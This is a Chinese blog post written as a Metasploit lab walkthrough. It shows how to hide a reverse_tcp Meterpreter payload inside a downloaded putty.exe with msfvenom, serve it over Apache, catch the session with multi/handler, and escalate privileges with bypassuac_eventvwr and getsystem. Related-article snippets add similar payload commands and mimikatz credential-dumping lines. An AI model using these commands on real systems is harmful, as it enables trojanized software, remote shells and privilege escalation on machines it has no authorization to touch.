MSF渗透测试之msfvenom提权

已于 2023-01-20 10:49:41 修改
阅读量981 收藏 11
点赞数 1
分类专栏: MFS渗透测试 文章标签: 测试工具 运维开发
于 2022-04-04 16:29:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/123953999
版权

MSF渗透测试之msfvenom

MSF后渗透之msfvenom生成payload提权

文章目录

前言

MSF后渗透之msfvenom生成payload提权
1.MSF的使用

一、MSF的使用?

MSF是一个渗透测试的靶机,集成了多个漏洞库和多个payload,用于渗透测试提权专用的提权工具。

二、提权第一步

1.打开kali,进入msfvenom,生成payload

代码如下(示例):
1.首先先打开kali的服务器, service apache2 start,让外界可以访问到kali。
2.生成payload。
(1)先在kali下载好后门工具。执行命令。
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
(2)利用msfvenom生成payload。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.222.131 lport=5445 -x putty.exe -e x86/shikata_ga_nai -f exe -o /var/www/html/hello.exe
在这里插入图片描述
(3)打开msf,使用攻击模块。
use exploit/multi/handler
(4)设置payload。
set payload windows/meterpreter/reverse_tcp
(5)打开options进行查看。
在这里入图片描述
设置好目标主机ip地址和端口
set lhost 192.168.222.131
set lport 5445
(6)run后,成功进入meterpreter后渗透阶段
在这里插入图片描述
(7)进行进一步的提权发现得不到系统的信息。只能继续下一步攻击,获得更高的权限。首先先回到session,执行background。
回到回话后,使用模块,设置session参数为1。
使用新模块提权
(8)run后得到系统信息,因为是在本机,直接就可以看到主机的事件查看表。
提权成功图
(9)在win7中,后渗透的取得系统权限的命令和模块执行background回到会话中
在这里插入图片描述
使用提权模块
use exploit/windows/local/bypassuac_eventvwr
查看options,设置session为
set session 1
在这里插入图片描述
执行run后,输入getsystem即可提升到系统权限了
实验成功

总结

本次实验是对MSF后渗透模块的一次渗透,利用msfvenom工具进行提权,集合了各个模块的使用,加深对MSF的进一步了解。

炫彩@之星
关注
专栏目录
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3586
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
msf php脚本提权,利用Metasploit提权Linux主机思路
weixin_39640904的博客
04-11 728
本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑大晚上的写个文章不容易而且有点小冷利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题PHP Meterpretermetasploit有一个名为PHP Meterpreter的payload,可创建具有meterpre...
msf下Windows提权
wjq18827615690的博客
03-18 272
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低权限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
使用MSF进行提权(windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1236
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
MSF进行提权
aozhuo4755的博客
08-14 1472
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.16...
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
【网络安全】 MSF提权
最新发布
一直被模仿,从未被超越
03-15 914
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
msf 渗透测试
06-05
### Metasploit渗透测试知识点详解 #### 一、Metasploit框架概述 Metasploit是一款功能强大的渗透测试框架,主要用于安全审计与渗透测试工作。它提供了丰富的模块支持,包括漏洞利用、后渗透攻击等,可以帮助安全...
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2343
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
MSF内网渗透实战
hackzkaq的博客
05-17 3897
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
msf windows提权方法总结
qq_45951598的博客
06-18 2895
简介 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 1.getsystem 这里使用getsystem命令试一下,运气好的话可能就提到了system 2.bypassuac 内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
MSF进行windows提权
m0_51822230的博客
05-25 712
主要思路 1.拿到webshell 2.上传大马 3.利用meterpreter模块生成payload 4.本地进行监听 5.进行提权 6.进行维权 7.生成新用户,连接3389 一、本地监听端口 ①.生成payload msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe ②.上传123.exe 这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可) ③.m
msf内网提权
dreamthe的博客
11-22 2374
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
权限提升-Web权限-MSF自动化
m0_65336233的博客
11-26 1137
简单的提权漏洞讲解
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 2016
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
msf提权
sulongniao3的博客
10-20 169
getuid 当前用户 getsystem 提权 bypassuac 提权 显示会话 sessions -i 进入一个会话 session -i 1 load mimikatz 获取帐号密码 wdigest 获取密码 mimikatz_command -f samdump::hashes 取得原始加密密码 mimikatz_command -f sekurlsa::searchPasswords use exploit/windows/local/bypassuac set SESSION 2 ru
Windows溢出提权 [msf全自动提权练习]
weixin_65722679的博客
07-21 503
Windows溢出提权 [msf全自动提权练习]
网络渗透测试技术:远程控制与权限提升实验
实验最后涉及到提权操作,查找并使用如pkexec等指令进行权限提升。" 实验报告详细介绍了网络渗透测试中的远程控制技术,这是安全领域中的一个重要概念,通常用于模拟黑客攻击以检测系统漏洞。实验分为四个部分: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值